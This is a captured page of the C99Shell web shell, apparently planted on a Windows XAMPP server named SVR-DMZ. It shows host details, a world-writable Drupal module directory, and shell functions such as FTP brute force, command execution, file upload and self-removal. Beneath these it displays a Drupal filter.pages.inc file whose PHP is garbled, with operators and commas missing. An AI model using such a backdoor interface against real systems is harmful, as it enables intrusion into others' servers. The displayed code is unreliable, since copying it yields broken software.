!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\htdocs\drupal\modules\filter\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     filter.pages.inc (1.31 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// $Id: filter.pages.inc,v 1.2 2007/11/10 17:41:18 dries Exp $

/**
 * @file
 * User page callbacks for the filter module.
 */


/**
 * Menu callback; show a page with long filter tips.
 */
function filter_tips_long() {
  
$format arg(2);
  if (
$format) {
    
$output theme('filter_tips'_filter_tips($formatTRUE), TRUE);
  }
  else {
    
$output theme('filter_tips'_filter_tips(-1TRUE), TRUE);
  }
  return 
$output;
}


/**
 * Format a set of filter tips.
 *
 * @ingroup themeable
 */
function theme_filter_tips($tips$long FALSE$extra '') {
  
$output '';

  
$multiple count($tips) > 1;
  if (
$multiple) {
    
$output t('input formats') .':';
  }

  if (
count($tips)) {
    if (
$multiple) {
      
$output .= '<ul>';
    }
    foreach (
$tips as $name => $tiplist) {
      if (
$multiple) {
        
$output .= '<li>';
        
$output .= '<strong>'$name .'</strong>:<br />';
      }

      if (
count($tiplist) > 0) {
        
$output .= '<ul class="tips">';
        foreach (
$tiplist as $tip) {
          
$output .= '<li'. ($long ' id="filter-'str_replace("/""-"$tip['id']) .'">' '>') . $tip['tip'] .'</li>';
        }
        
$output .= '</ul>';
      }

      if (
$multiple) {
        
$output .= '</li>';
      }
    }
    if (
$multiple) {
      
$output .= '</ul>';
    }
  }

  return 
$output;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--